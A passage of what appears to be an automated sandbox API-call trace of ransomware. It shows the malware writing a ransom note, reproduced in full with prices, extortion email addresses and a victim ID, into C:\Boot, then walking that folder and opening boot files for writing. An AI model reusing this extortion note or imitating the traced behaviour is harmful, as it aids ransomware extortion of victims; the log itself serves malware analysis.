(HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.879] PathFindFileNameW (pszPath="") returned="" [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.880] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.880] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.880] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b44498 [0165.880] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b44498 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.880] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.880] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.880] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.880] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.880] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.880] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.880] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.880] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.880] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.880] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0165.880] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.880] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.880] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0165.881] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.881] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.881] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.881] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.881] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.881] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.881] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.881] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.881] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.881] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.881] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.881] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.881] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0165.881] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.881] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0165.881] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.881] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0165.881] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.881] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0165.882] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.882] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.882] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.882] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.882] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0165.882] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.882] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.882] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.882] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.882] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0165.882] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.882] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.882] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.882] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.882] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0165.882] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.882] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.882] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.882] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c930 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.883] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x38) returned 0x362b8e0 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c430 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2a0 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c930 | out: hHeap=0xcd0000) returned 1 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c930 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.883] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x54) returned 0x3613610 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c458 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c430 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c930 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362b8e0 | out: hHeap=0xcd0000) returned 1 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c930 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.883] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c430 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c480 [0165.883] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c958 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2a0 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c458 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c930 | out: hHeap=0xcd0000) returned 1 [0165.883] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c930 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.884] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa8) returned 0x35e3330 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c458 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c688 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6b0 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c430 | out: hHeap=0xcd0000) returned 1 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c480 | out: hHeap=0xcd0000) returned 1 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c958 | out: hHeap=0xcd0000) returned 1 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c930 | out: hHeap=0xcd0000) returned 1 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c930 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.884] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: 